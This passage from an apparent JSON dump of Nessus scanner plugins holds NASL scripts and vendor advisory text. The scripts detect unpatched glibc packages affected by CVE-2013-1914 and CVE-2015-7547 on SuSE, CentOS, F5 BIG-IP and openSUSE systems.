sp:\"4\", cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"glibc-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"glibc-devel-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"glibc-html-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"glibc-i18ndata-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"glibc-info-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"glibc-locale-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:\"4\", cpu:\"i586\", reference:\"nscd-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-devel-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-html-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-i18ndata-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-info-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-locale-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-profile-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"nscd-2.4-31.109.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-09-04T03:14:32", "description": "This collective update for the GNU C library (glibc) provides the following fixes :\n\n - Fix stack overflow in getaddrinfo with many results.\n (bnc#813121, CVE-2013-1914)\n\n - Fix locking in _IO_cleanup. (bnc#796982)\n\n - Fix buffer overflow in glob. (bnc#691365)\n\n - Fix memory leak in execve (bnc#805899)", "cvss3": {"score": null, "vector": null}, "published": "2013-06-05T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : glibc (ZYPP Patch Number 8579)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1914"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_GLIBC-8579.NASL", "href": "https://www.tenable.com/plugins/nessus/66802", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66802);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1914\");\n\n script_name(english:\"SuSE 10 Security Update : glibc (ZYPP Patch Number 8579)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This collective update for the GNU C library (glibc) provides the\nfollowing fixes :\n\n - Fix stack overflow in getaddrinfo with many results.\n (bnc#813121, CVE-2013-1914)\n\n - Fix locking in _IO_cleanup. (bnc#796982)\n\n - Fix buffer overflow in glob. (bnc#691365)\n\n - Fix memory leak in execve (bnc#805899)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1914.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8579.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"glibc-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"glibc-devel-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"glibc-html-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"glibc-i18ndata-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"glibc-info-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"glibc-locale-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"nscd-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-devel-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-html-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-i18ndata-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-info-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-locale-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"glibc-profile-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"nscd-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.109.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.109.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-16T20:20:19", "description": "Updated glibc packages that fix one security issue and two bugs are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more shared libraries that make use of static thread local storage. While static thread local storage is the fastest access mechanism it may also prevent the shared library from being loaded at all since the static storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any more object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or certain timer API calls to fail and return errors in the presence of large thread-local storage data that exceeded PTHREAD_STACK_MIN in size (generally 16 KiB). The bug in librt has been corrected and the impacted APIs no longer return errors when large thread-local storage data is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "CentOS 6 : glibc (CESA-2016:0175)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2016-0175.NASL", "href": "https://www.tenable.com/plugins/nessus/88757", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0175 and \n# CentOS Errata and Security Advisory 2016:0175 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88757);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0175\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"CentOS 6 : glibc (CESA-2016:0175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-February/021668.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1fb5699a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-devel-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-static-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:20", "description": "Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing 'dual A/AAAA DNS queries' and the libnss_dns.so.2 NSS module.\n(CVE-2015-7547)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : glibc vulnerability (K47098834)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL47098834.NASL", "href": "https://www.tenable.com/plugins/nessus/88769", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K47098834.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88769);\n script_version(\"2.34\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"F5 Networks BIG-IP : glibc vulnerability (K47098834)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple stack-based buffer overflows in the (1) send_dg and (2)\nsend_vc functions in the libresolv library in the GNU C Library (aka\nglibc or libc6) before 2.23 allow remote attackers to cause a denial\nof service (crash) or possibly execute arbitrary code via a crafted\nDNS response that triggers a call to the getaddrinfo function with the\nAF_UNSPEC or AF_INET6 address family, related to performing 'dual\nA/AAAA DNS queries' and the libnss_dns.so.2 NSS module.\n(CVE-2015-7547)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K47098834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K47098834.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K47098834\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.3.0-11.6.1\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.4.0-11.6.1\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.0.0-11.6.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF2\",\"11.3.0-11.6.1\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:19:52", "description": "This update for glibc fixes the following security issues :\n\n - fix stack overflow in the glibc libresolv DNS resolver function getaddrinfo(), known as CVE-2015-7547. It is a client side networked/remote vulnerability.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-22T00:00:00", "type": "nessus", "title": "openSUSE Security Update : glibc (openSUSE-2016-234)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-32bit", "p-cpe:/a:novell:opensuse:glibc-debuginfo", "p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-debugsource", "p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-devel-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-static", "p-cpe:/a:novell:opensuse:glibc-devel-static-32bit", "p-cpe:/a:novell:opensuse:glibc-extra", 